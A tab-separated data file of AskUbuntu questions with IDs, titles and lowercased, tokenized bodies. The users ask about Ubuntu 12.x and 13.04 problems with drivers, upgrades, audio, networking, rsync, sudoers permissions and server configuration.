291271	wifi , as it relates to my router	why does my ubuntu make a wifi connection only when i disable the security settings of the router ? i have a 3-computer network , 2 of which connect just fine ( with the router 's security settings enabled ) . the other two are win xp pcs . the ubuntu also connected just fine ; and then for reasons unknown to me , stopped connecting ! my belkin router : security mode/authentication : wpa-wpa2 ( personal psk ) / wpa-psk +wpa2-psk wireless channel : auto wireless mode : g and b protected mode : on 802.11e qos : on encryption technique : tkip + aes wi-fi protected setup : on will either of these pieces of info help you to help me ? network controller : broadcom corp bcm4313 802.11b/g/n wireless lan controller ethernet controller : atheros comm inc. ar8152 v1.1 fast ethernet ( rev c1 ) any advise , suggestions , solutions will be greatly appreciated ! thank you for looking . btw , here is the link for the text from my ubuntu , after entering a : âsudo lshw -c network http : //sites.google.com/site/stufff2share/brlu
291279	running liveusb vs install ubuntu on usb drive	what is main differences between running ubuntu on liveusb ( created with startup disk creator with persistent storage ) and install ubuntu to partitions on usb disk ? i love liveusb but i ca n't put password on it , and it 's a pain if i need to click try ubuntu everytime . if i just complete install ubuntu to usb disk , is there any performance issue ? and , will it run on almost any computer like liveusb do ?
291282	distupgradefetchercore errors while upgrading 12.10 to 13.04	when i try to upgrade my 12.10 install to 13.04 via do-release-upgrade , i get the error : file `` /usr/bin/do-release-upgrade '' , line 145 , in < module > fetcher.run_options += [ `` -- mode= % s '' % options.mode , attributeerror : type object 'distupgradefetchercore ' has no attribute 'run_options' when upgrading from gtk , the update-manager quits after informing about the new upgrade . this seems to be common as i 've seen at least three threads on askubuntu about this error . any help ?
291283	mouse `` thumb '' button to navigate forward and back ?	i recently installed 13.04 on my desktop , and ca n't seem to get this working in chromium . not sure if it 's supposed to work in the file browser , or what . i 've spent the last two hours looking through a bunch of obscure information that has led me nowhere . i 've tested the button with xinput , and it does , in fact , trigger input 9 when i press it , but where would i set to do something ? should n't this work out of the box , or what ?
291290	sound comes through speakers and headphones on ubuntu 12.04	i have an hp pavilion dv6-2157wm laptop with altec lansing speakers , srs premium sound , powered by an idt card i believe . well , when i plug in my headphones ( or earbuds ) sound comes through them but also from the main speakers as well . i do n't believe it is a hardware issue because the jack works fine on windows and no sound comes from the speakers . also , did i mention that i 'm dual-booting ? i 've looked all around , but i ca n't seem to find a driver for any of these services . oh , and i 've also tried the gnome alsa mixer ( from the ubuntu software center ) and it did n't yield much . what do you guys suggest ? please help ! i really like what i see in ubuntu and have even considered making it my mainstream os . p.s . if i have to try anything via the terminal , could you please walk me through it ? i know only the basics of the terminal and have turned to the software center for my installations .
291302	gaming on 13.04 using more advanced drivers for intel 3000 hd lagging ?	i recently found a beta version of portal for steam . i install the beta version and started it up to find the graphics did n't look right at all . i looked through the comments from omgubuntu seeing that they were talking about drivers for other graphics cards . someone had an image of the same issue i have with the beta version of portal . one other person gave 2 links to more updated drivers for intel . the first one was 12.04 and 12.10 . graphics drivers the second link was for 12.04 through 13.04 and is the one i used . launchpad archives i installed the packages , started portal again and this time it actually worked to make the grapics look right . i tried it with team fortress 2 and that also worked since tf2 also did n't look right . however , when playing bastion , the game is actually slower and lagging with these packages where as the default drivers worked fine for bastion . so what are my options then ?
291306	64-bit install broken after 13.04 upgrade	i have samsung r780 laptop ( core i5 , nvidia ) on which i had run ubuntu successfully ( save for glitchy wireless ) for two years . however , after last upgrade the installation broke , and i can not even login in the text mode any more . during the upgrade , many errors were thrown , and eventually it exited saying upgrade was incomplete . i tried the option with partial upgrade . after the restart it would get stuck on the loading screen ( purple with dots ) , and wouldn’t go past that to login screen ( no hdd activity , ctrl + alt + function keys that would switch between consoles just show blinking cursor ) . i’ve tried recovery options ( enable networking , and try repairing broken packages ) , but it ignores or can not find the repositories . in the end it says it can not parse package lists , and write to couple directories . same thing happens during apt-get update from the root shell . likewise , it can not check the file system . while trying these options , it displays error messages saying this or that package or library was not found , as if upgrade deleted some stuff without replacing it , i assume . several recovery options resulted in the following error message : error while loading shared libraries : libudev.so.1 : can not open shared object file : no such file or directory i’ve tried nomodeset option in grub , it didn’t help any . when i removed quiet and splash options ( by the way , splash option was written in twice for some reason ) , i’ve got the following message ( sic ) on which the boot hangs : init : mountall main process ( 326 ) terminated with status 127hared object file : no such file or directory
291312	how to install scanjet 3200c on ubuntu 12.10 ?	how to install scanjet 3200c on ubuntu 12.10 ? i am new to ubuntu , so please help in details . i have done these all settings which is mentioned in one of portuguese blog i went into the bios and activated epp mode for lpt1 , irq 7 0x378 . i guess i do not need these parameters but is recommended epp mode . i was in /etc/sane.d/dll.conf and commented the line where was the umax and uncommented the umax_pp . insert my user group lp inspite of all i am unable to get through it . the problem is , its not able to detect the scanning device . please help me out .
291316	macbook 3,1 : wireless not enabled on startup after upgrade to 13.04	after having upgraded my ubuntu from 12.10 to 13.04 the wireless device has stopped working . it simply does not show up in the panel nor in the network settings . lspci gives : $ lspci -nn -d 14e4 : 02:00.0 network controller [ 0280 ] : broadcom corporation bcm4321 802.11a/b/g/n [ 14e4:4328 ] ( rev 03 ) i have enabled the broadcom driver under addtional drivers . also i have run $ sudo apt-get install firmware-b43-installer b43-fwcutter without error messages ... however , when i run $ sudo modprobe b43 my wifi shows up . now , my questions are : what does modprobe do ? how to enable modprobe on startup automatically ? is this legit or a workaround that may lead to more trouble in future ?
291319	ubuntu alongside windows 8	i just bought myself a new laptop that comes with windows 8 pre installed .. now i hate windows 8 .. i wanted to know ..if i uninstall windows 8 and install windows 7 , will the uefi thing go away ? i hate the concept of it and it seems hard to install ubuntu alongside windows 8 .. so is there a way i can do that - remove windows 8 , install windows 7 and then dual boot it with ubuntu in the normal method ? will removing windows 8 remove the uefi thing ? thanks ! : )
291322	how to exclude files in rsync ?	i 'm using ubuntu server 12.04 , now i want to backup some files using rsync , here is a try : rsync -aax $ home/documents/* $ home/backups/test -- exclude= { $ home/documents/another/* , $ home/documents/temp/* } as you can see , i want to backup all files in the folder $ home/documents to folder $ home/backups/test , but exclude files in folder another and temp . but i failed , rsync still copied the files in both excluded folders : ls $ home/backups/test/another test test is a file in the folder another , and it is also copied though i exclude the file in rsync , why ? how to let those files be actually excluded ?
291325	change xchat `` clear text '' shortcut key ( accelerator )	in ubuntu 13.04 , the wise developers decided to get rid of a shortcut i commonly use : ctrl+l to clear the text . manually modifying the shortcut does not seem to work ; i tried the instructions here : dconf-editor and org/gnome/desktop/interface/can-change-accels do not make a difference , not even with ubuntu_menuproxy=0 . changing shortcuts in gedit works , though . is this an xchat speciality ? how can i get my shortcut back ?
291328	bumblebee installation on ubuntu 12.04	i installed ubuntu 12.04 and bumblebee on my lenovo w530 which comes with nvidia optimus card by following this wiki : ubuntu wiki i am trying to use the dvi ports ( 2 ports ) on my docking station to extend the display . it does not work and i can not even get any output on my vga .
291334	13.04 no sound while running applications as seperate user	firstly i have to say i 'm really enjoying ubuntu 13.04 , many changes seem subtle but overall it seems to be a much improved experience over 12.10 . most notably the snappy gui responsivity is awesome . there 's actually not a whole lot i can complain about so far , and that 's an unusual experience for me with linux ! but my major grievance at the moment , is having recently upgraded to raring , i 've noticed that : '' sudo su testuseraccount '' , then running any application , results in that application running without audio . : o ( where as doing the same on lubuntu 12.10 ( although it did n't work on my ubuntu 12.10 livecd session ) the sound is fine . i imagine if there 's no workaround for this , it will totally kill any chance of using raring ringtail as a multiseat os . also it means applications that wo n't run at all without audio , wo n't run when they 're running on a secondary login . i had a look posts regarding simultaneous multi user access to pulse audio , but it 's all double dutch to me , and i suspect most of it was n't relevant to this particular situation . so can anyone tell me if there 's anything that can be done to get back sound on secondary user sessions ?
291336	permission denied viewing content of remote network share	i 'm trying to mount a remote network share , but have trouble viewing the content . it is showing up in my mounted devices but when i attempt to open it , i get this location could not be displayed . you do not have the permissions necessary to view the contents of âliffeyâ . my fstab entry looks like this : //liffey.cis.utas.edu.au\lukass /media/utas/liffey cifs sec=ntlmv2 , credentials=/root/.utascredentials , iocharset=utf8 , file_mode=0711 , dir_mode=0711 , 0 0 when liffey is mounted the permissions look like this : drwx -- -- -- 22 10455 204 0 mar 14 14:09 liffey but unmounted : drwxrwxrwx 2 lukas lukas 4096 may 6 16:44 liffey my .utascredential file : -rwx -- x -- x 1 lukas root 34 may 4 20:56 .utascredentials i can have rw access as root , so it must be a local permission conflict . i 'm stuck , any help would be appreciated . cheers lukas
291338	ctrl + alt + p restore from maximization shortcut , how to disable it ?	i am a user of the application sublime text , which i use for my work . i use ctrl+alt+p to bring up the `` quick switch project '' dialog . unfortunately , since i upgraded to 13.04 , sublime text is not receiving the combination . instead , ( with any application ) it seems to restore completely maximized windows to an unmaximized state . i would appreciate any help in isolating and disabling this combination . i have already tried all of the typical methods , such as the system settings tool and ubuntu tweak .
291340	gwt ( google web toolkit ) designer not working on ubuntu 13.04	on 13.04 the gwt designer is not working on eclipse 4.2 and eclipse 3.7 . if i want to switch in the design-mode after executing workaround 2 from this page , eclipse crashes and is closing automatically . i asked this question for 12.10 , where it works for my answer on 12.10 . i tested both answers from this question and none is working on 13.04 .
291342	installing ati radeon hd driver on ubuntu 13.04	i have a hp probook 4520s with amd ati radeon graphic hd 530v graphic card . when i installed ubuntu 13.04 it recognized a graphic card named : gallium 0.4 on amd rv710 and it 's working fine , my question is do i need to install ati catalyst control center for my graphic card or not stick with ubuntu default setting ?
291350	installed mupen64plus package , but ca n't see it anywhere	i installed mupen64plus using this command : apt-get install mupen64plus , then i tried to run it from the command line , but it did n't found the executable . then i tried to look it up in xfce 's list of program , and it did n't appear in the list . i also followed the instructions from the first answer of this question : how do i install mupen64plus ? and not luck either . the package ( https : //apps.ubuntu.com/cat/applications/mupen64plus/ ) is installed , but it says in the software center that it only takes 37kb of disk space ( which is ridiculous ) . does somebody knows where is the problem ? thanks .
291352	how can i make a command execute at startup ?	i wanted to remap the keys for my page up and page down number pad so that they would actually act like the real page up and page down . i used the xmodmap successfully following the directions based on the how-do-i-remap-certain-keys help ( plus some a tweak that i realized on my own ) . i would like to make those two commands execute every time i start the computer : xmodmap -e `` keycode 89 = next kp_3 next kp_3 '' xmodmap -e `` keycode 81 = prior kp_9 prior kp_9 '' sure , i can see that the proper way to remap the keys would be to create xinitrc and xmodmap files , but i thought it would be a good time to learn how to make something happen at startup instead . also , i thought this would be easier to maintain since i would only have to keep track of the startup scripts rather than remember the xmodmap files . based on the instructions in how to make a command execute at start-up i thought i could add the commands to my /etc/rc.local file , but that 's clearly not working . also , based on the directions in the bash startup guide , i tried adding the commands to ~/.bashrc and ~/.bash_profile . this also did n't work . can anyone tell me what i 'm missing ? thank you
291353	no hdmi audio in 13.04	i have just upgraded from 12.10 to 13.04 and now everything works perfectly , except the fact that i have no audio via hdmi . i am using a samsung tv-monitor connected via hdmi to my video card asus eah4670/di/1gd3 ( which has a radeon hd 4670 gpu on it ) , installed phisically into my motherboard which is a msi 770-c45 . i am running kernel 3.9 , i just have no sound . i tried downloading and installing https : //code.launchpad.net/~ubuntu-audio-dev/+archive/alsa-daily/+files/oem-audio-hda-daily-dkms_0.201304261252~raring1_all.deb , but without any good result . please help , i need my audio back . in the end , this is my lspci command output . ale @ beast : ~ $ lspci 00:00.0 host bridge : advanced micro devices [ amd ] nee ati rx780/rx790 host bridge 00:02.0 pci bridge : advanced micro devices [ amd ] nee ati rd790 pci to pci bridge ( external gfx0 port a ) 00:06.0 pci bridge : advanced micro devices [ amd ] nee ati rd790 pci to pci bridge ( pci express gpp port c ) 00:11.0 sata controller : advanced micro devices [ amd ] nee ati sb7x0/sb8x0/sb9x0 sata controller [ ide mode ] 00:12.0 usb controller : advanced micro devices [ amd ] nee ati sb7x0/sb8x0/sb9x0 usb ohci0 controller 00:12.1 usb controller : advanced micro devices [ amd ] nee ati sb7x0 usb ohci1 controller 00:12.2 usb controller : advanced micro devices [ amd ] nee ati sb7x0/sb8x0/sb9x0 usb ehci controller 00:13.0 usb controller : advanced micro devices [ amd ] nee ati sb7x0/sb8x0/sb9x0 usb ohci0 controller 00:13.1 usb controller : advanced micro devices [ amd ] nee ati sb7x0 usb ohci1 controller 00:13.2 usb controller : advanced micro devices [ amd ] nee ati sb7x0/sb8x0/sb9x0 usb ehci controller 00:14.0 smbus : advanced micro devices [ amd ] nee ati sbx00 smbus controller ( rev 3c ) 00:14.1 ide interface : advanced micro devices [ amd ] nee ati sb7x0/sb8x0/sb9x0 ide controller 00:14.2 audio device : advanced micro devices [ amd ] nee ati sbx00 azalia ( intel hda ) 00:14.3 isa bridge : advanced micro devices [ amd ] nee ati sb7x0/sb8x0/sb9x0 lpc host controller 00:14.4 pci bridge : advanced micro devices [ amd ] nee ati sbx00 pci to pci bridge 00:14.5 usb controller : advanced micro devices [ amd ] nee ati sb7x0/sb8x0/sb9x0 usb ohci2 controller 00:18.0 host bridge : advanced micro devices [ amd ] family 10h processor hypertransport configuration 00:18.1 host bridge : advanced micro devices [ amd ] family 10h processor address map 00:18.2 host bridge : advanced micro devices [ amd ] family 10h processor dram controller 00:18.3 host bridge : advanced micro devices [ amd ] family 10h processor miscellaneous control 00:18.4 host bridge : advanced micro devices [ amd ] family 10h processor link control 01:00.0 vga compatible controller : advanced micro devices [ amd ] nee ati rv730 xt [ radeon hd 4670 ] 01:00.1 audio device : advanced micro devices [ amd ] nee ati rv710/730 hdmi audio [ radeon hd 4000 series ] 02:00.0 ethernet controller : realtek semiconductor co. , ltd. rtl8111/8168 pci express gigabit ethernet controller ( rev 03 ) ale @ beast : ~ $
291354	grub does not listlen to input devices ( keyboard )	i 've got ubuntu 12.10 and windows 7 installed on my laptop . i 've never had any problems with anything related grub or the oss ( at least not something strange that i can not fix ) . well , grub went crazy , 30 % of the times i start my laptop , it stops to read from the keyboard . i mean , i hit enter / arrow / e but it does not react . i guess something like keyboard driver is not doing its job . it wait 10 seconds and load ubuntu . ( yes it wait 10 sec like always and load ubuntu the way it should ) . 70 % of the time , however , it is working perfect . i really ca n't catch when . why it stop working ? i tried refreshing the grub ( reinstalling ) , but it did n't work . still the same once it work , once it does n't . sorry if you had problems understanding this . i 'm no native english speaker .
291358	nginx access configuration	i 'm using ubuntu x64 server with nginx as webserver . in my company , we configured intranet ( local ) dns server so that , when you enter domain1.com , it goes directly into defined lan ip adress . we need global access for domain2.com , which located in same server . when we open global access for domain2.com , occurred following problem : as you know , anyone can detect ip adress of domain2.com ( our server ) . the problem is , when you access directly using server 's global ip adress , server opens automatically domain1.com which must be restricted for global access . here is nginx config of domain1.com : server { set $ host_path `` /var/www/domain1 '' ; server_name domain1.com ; root $ host_path ; set $ yii_bootstrap `` index.php '' ; client_max_body_size 2000m ; client_body_buffer_size 1024k ; listen 80 ; charset utf-8 ; index index.php index.html ; access_log /var/access_log ; error_log /var/error_log ; location ~ / ( protected|framework|nbproject ) { deny all ; access_log off ; log_not_found off ; } location / { try_files $ uri $ uri/ /index.php ? $ args ; } location ~ \.php $ { fastcgi_split_path_info ^ ( .+\.php ) ( . * ) $ ; # let yii catch the calls to unexising php files set $ fsn / $ yii_bootstrap ; if ( -f $ document_root $ fastcgi_script_name ) { set $ fsn $ fastcgi_script_name ; } fastcgi_pass unix : /var/run/php5-fpm.sock ; fastcgi_index index.php ; fastcgi_param script_filename $ document_root $ fastcgi_script_name ; include fastcgi_params ; } location ~ /\.ht { deny all ; } } how to make domain1.com only for lan ( restrict global access ) ?
291361	hibernate not working 13.04 : screen flashes / blanks out and locks	i am using ubuntu 13.04 . i face problem in hibernate option . i have created swap disk also enabled hibernate option referring the manual . whenever i select hibernate the screen flashes / blanks out and locks . obviously its not going to hibernate mood . am i missing something ? please help .
291362	questions about apt-cache showpkg	when i enter $ apt-cache showpkg gnome-devel in my terminal , i get : package : gnome-devel versions : 1:3.0+6ubuntu4 ( /var/lib/apt/lists/fr.archive.ubuntu.com_ubuntu_dists_quantal_universe_binary-amd64_packages ) description language : file : /var/lib/apt/lists/fr.archive.ubuntu.com_ubuntu_dists_quantal_universe_binary-amd64_packages md5 : 4682dc9d7825daf220363435b46d793b description language : en file : /var/lib/apt/lists/fr.archive.ubuntu.com_ubuntu_dists_quantal_universe_i18n_translation-en md5 : 4682dc9d7825daf220363435b46d793b reverse depends : dependencies : 1:3.0+6ubuntu4 - anjuta ( 2 2:3.0 ) anjuta-extras ( 2 3.0 ) devhelp ( 2 3.0 ) glade ( 2 3.10 ) gnome-devel-docs ( 2 3.0 ) gnome-platform-devel ( 0 ( null ) ) provides : 1:3.0+6ubuntu4 - reverse provides : but there is a some details that i do n't understand ? what does means `` 1:3.0+6ubuntu4 '' here ? is it the minimum ubuntu version for this package ? what does means ( 0 ( null ) ) for the dependency package gnome-platform-devel ? i think that it is for saying that this package is just recommended : i am right ? in ajunta ( 2 2:3.0 ) : what does mean the leading `` 2 '' in version number ( 2 2:3.0 ) ? i think that it is for `` > = '' : am i right ? regards
291364	adding user with existing encrypted home	my system has separated /home partition which is encrypted . i did a fresh install with a new temporary user . now , i want to add old_user back with existing encrypted home . is it possible ?
291365	internet traffic monitor for ubuntu	i installed netspeed but it seems that run only on gnome desktop is there another internet traffic monitor for ubuntu ?
291375	how to change bash title in a python virtual environment	i would like to know how to change the bash title modifying the configuration files . i often program in python and use virtualenv to keep my development environment separated from the system-wide environment . modifying the virtualenvpath/bin/activate script i could make so that the name of the virtual environment is shown in red , however the title is set to the directory i am when i activate the virtual environment . how can i modify the activate so that the title changes when i change directory ?
291376	how to reinstall ubuntu 13.04 raring ringtail safely ?	how can i reinstall ubuntu 13.04 safely , without losing anything except settings ? is it possible ? or at least keep only programs and the home directory ? i want to reinstall as i have recently experienced various issues like the scrolling being very jumpy and lightdm rendering weirdly . can someone more experienced explain how to reinstall ubuntu as i have been searching in vain for days . thanks in advance .
291378	do we still need swap partitions on desktop ?	i have read this question , but it was asked in the context of servers not desktops or notebooks . if a good amount of ram is installed on a notebook , say 8 gb , do we still need a swap space ?
291386	how do i enable live window resizing in ubuntu 13.04 ?	in ubuntu 13.04 when you resize an application window by clicking with the mouse on any of its borders the whole window area gets covered by an orange transparent film ; if then the mouse cursor is moved in any direction the orange area is dynamically changed following the mouse cursor position , but the window size gets actually changed only when the mouse button is released . how do i change this behavior so that the window size is actually changed on the fly with the mouse cursor ?
291392	how to add more than four keyboard layouts in ubuntu 12.04 ?	how to add more than four keyboard layouts in ubuntu 12.04 ? i am surprised that i ca n't add more than four language keyboard layouts .
291393	where is unity startup script in rc ? .d	i 've been reading about runlevels and startup scripts lately , and i 've learnt that runlevels 2 to 5 are the same in ubuntu , and that ubuntu 's default runlevel is 2 . what i want to do i want to remove the script that starts unity from runlevel 3 , or actually prefix it with a `` k '' to kill it when i switch from runlevel 2 to 3 . why do i want to do it i want to experiment with runlevels and understand `` init '' and startup scripts and all that . after i remove unity from starting in runlevel 3 , i want to run the command telinit 3 to see what happens . what am i facing ? the current scripts/links in /etc/rc3.d/ are as follows : alaa @ aa-ubuntu : ~ $ ls -l /etc/rc3.d total 4 lrwxrwxrwx 1 root root 32 nov 22 12:14 k08vmware-usbarbitrator - > /etc/init.d/vmware-usbarbitrator lrwxrwxrwx 1 root root 26 mar 30 10:51 k25vpnagentd_init - > /etc/init.d/vpnagentd_init -rw-r -- r -- 1 root root 677 jul 21 2012 readme lrwxrwxrwx 1 root root 16 nov 22 12:13 s19vmware - > ../init.d/vmware lrwxrwxrwx 1 root root 20 oct 30 2012 s20kerneloops - > ../init.d/kerneloops lrwxrwxrwx 1 root root 27 oct 30 2012 s20speech-dispatcher - > ../init.d/speech-dispatcher lrwxrwxrwx 1 root root 31 nov 19 17:10 s20vboxautostart-service - > ../init.d/vboxautostart-service lrwxrwxrwx 1 root root 20 nov 7 11:52 s20virtualbox - > ../init.d/virtualbox lrwxrwxrwx 1 root root 20 jan 28 16:30 s31atieventsd - > ../init.d/atieventsd lrwxrwxrwx 1 root root 15 oct 30 2012 s50rsync - > ../init.d/rsync lrwxrwxrwx 1 root root 15 oct 30 2012 s50saned - > ../init.d/saned lrwxrwxrwx 1 root root 32 nov 22 12:14 s50vmware-usbarbitrator - > /etc/init.d/vmware-usbarbitrator lrwxrwxrwx 1 root root 35 nov 22 12:14 s55vmware-workstation-server - > ../init.d/vmware-workstation-server lrwxrwxrwx 1 root root 19 oct 30 2012 s70dns-clean - > ../init.d/dns-clean lrwxrwxrwx 1 root root 18 oct 30 2012 s70pppd-dns - > ../init.d/pppd-dns lrwxrwxrwx 1 root root 14 mar 3 10:10 s75sudo - > ../init.d/sudo lrwxrwxrwx 1 root root 20 oct 31 2012 s80metasploit - > ../init.d/metasploit lrwxrwxrwx 1 root root 26 mar 30 10:51 s85vpnagentd_init - > /etc/init.d/vpnagentd_init lrwxrwxrwx 1 root root 22 oct 30 2012 s99acpi-support - > ../init.d/acpi-support lrwxrwxrwx 1 root root 21 oct 30 2012 s99grub-common - > ../init.d/grub-common lrwxrwxrwx 1 root root 18 oct 30 2012 s99ondemand - > ../init.d/ondemand lrwxrwxrwx 1 root root 18 oct 30 2012 s99rc.local - > ../init.d/rc.local i do not know which one is responsible for running the unity user interface .
291402	best practice : version numbers for own packages	recently i 've started packaging software with fpm . the public makefiles can be found on bitbucket . but i 've a problem with version numbers . when i 'm generating a package for e.g . the fish-shell i would have to make clear , that the original version of the package has n't changed , but that this would be the e.g . second package i 've generated , so that it can replace the previously generated package . is there a best practice or convention ?
291412	downloads folder restores automatically	over the last couple of days i 've noticed that each time the downloads folder is modified , ie , any new file is downloaded , previously deleted folders are restored . and the restored folders are empty , as in , they do n't contain any data whatsoever . my major issue with this is that each time this happens , i need to re-organize the entire downloads folder again and continuously remove the empty folders . any help would be greatly appreciated .
291414	symbolic link creation pointing firefox	i am getting this error on firefox when trying to confirm a file over the internet : error type : java.lang.unsatisfiedlinkerror error message : native library /usr/lib/firefox/libmozsqlite3.so already loaded in another classloader i 've been told to create a new symbolic link for this path to solve this problem , but i do n't know how to do it , could you please help me out on this one ?
291415	printing accented characters on the terminal	i 'm running a java program from command line in ubuntu , and trying to print accented characters onto the console . but the characters get displayed as ? on the console . how do i make the shell display accented characters that are output from the program ?
291416	bad wifi reception on asus zenbook ( works great with windows 7 )	my wifi reception on my asus zenbook ( model ux31 ) is very weak compared to when i boot my windows 7 . i use both from the same location , and the reception on other devices ( ex : my iphone ) is great . i 'm now using ubuntu 13.04 , but this problem was present on ubuntu 12.10 as well . any known issues and fixes with the wifi ( driver ? ) . thanks !
291417	want to install ubuntu without any change of my hardisk	during installation i have a screen to specify space . is that can any change of my harddisk .
291419	13.04 and dual monitors	sorry , but i really did n't know where to put this . i actually wanted to warn that using a vga or hdmi cable to connect to a second screen or tv gives a very messy image and does n't work correctly at all . the best it can do is to mirror what is on my screen , after some weird image bug . if there 's a better place to post this problem , let me know , please .
291420	problems with /etc/sudoers	i am running ubuntu 12.04 on i3 laptop . by mistake i changed the permissions and changed the user ( from root ) of /etc folder and i am getting a error when trying to use sudo like : sudo : /etc/sudoers is made 0777 , should be 0440 sudo : no valid sudoers sources found , quitting sudo : unable to initialize policy plugin i have tried going to recovery mode and root shell prompt and then i did following chown root : root /etc/sudoers chmod 440 /etc/sudoers chown -r root : root /etc/sudoers.d chmod 755 /etc/sudoers.d chmod 440 /etc/sudoers.d/* but after every command it shows : read only file systems and it does nothing . thanks in advance for your help .
291422	ubuntu lamp server do i need the dns service ?	i have a vps which was setup preinstalled with various different services i want to know can i remove things like dns , pop , imap etc without affecting my lamp setup ? im pretty sure i do n't need these ... thanks
291424	problem with setting up joomla on xammp	i have ubuntu 13.04 and i extracted joomla on htdocs folder then i setup it after that i have to enter the joomla administration panel and when i enter the default username ( root ) and without a password it gives me an error with connecting to database i searched the internet and they said the problem either in database username or password and mine does n't have any password anyone can help ? ?
291425	new xps , starting on linux , still a windows power user , configuration question	i just bought a dell xps with windows 8 . spent several months making the choice . the os is on the 500gb hdd , and the 32gb ssd is used as cache.. seems standard . i 've been wanting to get into linux for some time . i want to move my programming environment out of windows , and then only use win for heavy graphics and video editing , which i do n't do as often . so ... what is the best configuration that i can do ? i still will be using windows daily , and for all my media needs . how much space does win 8 really need ? including apps such as creative suite 6 , php storm , and 3dmax ( my three workflows ) ? i ca n't decide whether it would be better to re-install win 8 and its apps all on the ssd ( probably not adequate size ) , and split the hdd between a small linux partition and the rest , data.. or sacrifice intel rapid start and put linux on the ssd , and win 8 on the hdd . or if i should set up it again as dell has it , and just create a separate partition on the hdd for linux.. thoughts ?
291433	-- mandir command not found	i am trying to set up ushare for my xbox , but i run into the next error . i have installed ushare and the source code , and also extracted the source code with wget http : //ushare.geexbox.org/releases/ushare-1.1a.tar.bz2 -o - | tar -jxvf - and i set the directory to this ./ushare-1.1a . next i have to configure some things using the following code : ./configure -- prefix=/ -- bindir=/usr/bin -- mandir=/usr/share/man which gives me the following error : unknown option `` -- mandir=/usr/share/man '' . see ./configure -- help for available options . when i open the help option as said above , i ca n't seem to find any option which is called -- mandir what does this command mean and what does it do ? ( i am relatively new to ubuntu so i have no clue what this means . i am following a how-to from ubuntu for what i am trying to do ( https : //help.ubuntu.com/community/xbox360media ) )
291434	how do i find out how popular an application is ?	for me there are two use cases when i am interested in the popularity of a given application or an application version on ubuntu : there is a choice of several similar applications . before i install one of these i would like to know which one is the most popular . to continue developing i get quite some motivation impulse from knowing that people actually do use my application . other than the ubuntu populary contest i am not aware of any other service to tell me . sadly popcon ubuntu is rather out of date lately ( see bug # 1067227 and more ) . alternatives listed in answers to `` tracking the popularity of a package over time ? '' are even more outdated . when an application source or a deb package is published on launchpad we can see the download statistics of this package in the `` download project files '' section , but this does not cover installations through a ppa , or when people installed an application from the repositories ( which will be the usual case ) . is there any other way i may have missed to find out about an application 's popularity ?
291442	i have some problem in logging in	when i tried to log onto my user id , it does not accept any password . previously also , i used to confront the same problem . but then , i would go for opting 'switch user option ' when a circular shaped icon would appear , by clicking which i could choose between ubuntu and ubuntu2d . then logging in would be possible . but unfortunately that 's not happening any more . as a result , i am unable to even switch off the laptop . i have simply to let the charge of the battery drain out completely . please help .
291444	ubuntu ca n't connect to wifi network	our company network administrator had previously registered my win8 laptop on the network . in win8 i can connect to the network ( by clicking its name in available networks ) and to connect to the internet , i have to create a windows broadband connection with my credentials . now this works even after i re-installed my win8 from scratch . i thought ubuntu would be the same . but ubuntu ca n't even connect to the wifi network ( it shows the network 's name , but never connects . the network is open and its type is : access point ) . does it have to do something with the registration process ? is there a workaround or should i ask them to `` register '' ubuntu too ? btw , i have no problem connecting to my home network using either win8 or ubuntu . edit : i have an android device . by mac spoofing , i changed the mac address of the device to my laptop 's mac address and it could n't connect to the network either . is there something else happening besides mac address filtering ?
291445	why does n't this command work as an alias ?	i 've been using the following command to list the ten largest files , at any depth , under the current directory : find -type f -size +10m -exec ls -ggssh1 { } + | awk 'nr < =10 { print $ 0 } ' ( i use awk instead of head to prevent a broken pipe error when the list is too long ) it works well , but it 's evidently hard to remember and type every time . i tried putting this in .bash_aliases , but it does n't work then ( it prints 10 empty lines ) . if i use less instead of awk , the output is presented correctly , but that means showing the whole list of files bigger than 10mb ( my lower threshold ) , sorted by size , rather than only the top ones . so , what 's making awk choke as part of an aliased command here ( assuming that 's indeed the problem ) , and what can i do to fix it ?
291454	`` libpeas-warning ** : could not find loader 'python3 ' for plugin '' when loading a pluging in gedit	i recently upgraded to ubuntu 13.04 and i use gedit for a lot of things . i was trying to install some plugins that i use quite frequently and i came into some issues . first i installed the plugins like so : sudo add-apt-repository ppa : gnome3-team/gnome3 sudo apt-get install gedit-plugins i can see the plugins in gedit but when i choose to use a plugin via the edit > preferences > plugins menu this message shows up : ( gedit:6027 ) : libpeas-warning ** : could not find loader 'python3 ' for plugin 'codecomment' i know i have python3 installed because when i type python3 in my terminal i get : python 3.3.1 ( default , apr 17 2013 , 22:32:14 ) [ gcc 4.7.3 ] on linux type `` help '' , `` copyright '' , `` credits '' or `` license '' for more information . > > > i also have python 2.7.4 , by similar terminal command . if anyone can help me get these plugins up and running in gedit i would appreciate it very much .
291459	13.04 installation not recognising current os	i have tried installing but the default option is replace current os with ubuntu . there is no option to run alongside . i have vista . the main 13.04 faq and help thread is no help in this issue with installation .
291464	get security updates delta , and install them	i am writing a script that is supposed to run every day to check if there are any new security updates for ubuntu . if there are , it will make a list of those updates , it will download them , and then run some tests . the purpose of this script is to make sure that no security updates break our code running on the ubuntu . i am not an experienced user with ubuntu , so forgive me if this question seems trivial . i have researched quite a bit , and found information like this which is useful i presume to those who are home-users or such . but i can not install extra packages , nor does this provide any solutions for doing it without installing packages , ( i tried every answer that did not include downloading new packages ) so to refine my question , i would like a command that will fetch all the security updates ( so i can see them as a list , and include it in the daily report of which security packages have updates ) and then also download and install them . the testing and such i do myself ( obviously ) i just need help understanding which commands to run . since scripts will be running these commands , they do not need to be human-readable in any specific way , so they can be long and extraneous , or such , and preferably 1-liners that do not require pre-configuration .
291465	virtualize ubuntu server 12.0.4 into 3 different containers	i have a dedicated server with 2 tb disk space , 16 gb memory . i need to virtualize it to 3 different containers ( public , private and dev ) . i have been evaluating open vz but it caused disk quota problems . i appreciate some recommendations that allows me to virtualize the server and use the same kernel .
291471	microphone not working in skype	i have installed skype , but i can not make it work with my headset ( corsair vengeance 1500 . the problem is that whichever option i choose as microphone it will never work , and only when i select some options can i hear any sound from skype . my sound does however work for the system sounds and the voice recorder works also . i can not enclose a picture of the options i recieve , because neither prnt screen nor shutter allows me to capture the window . i have already tried a lot of fixes like checking pavucontrol ; it only states that nothing is recording audio even when iâ´m using the voice recorder . the options i recieve in the sound options do not show up in skype so i canâ´t use those options as a guideline .
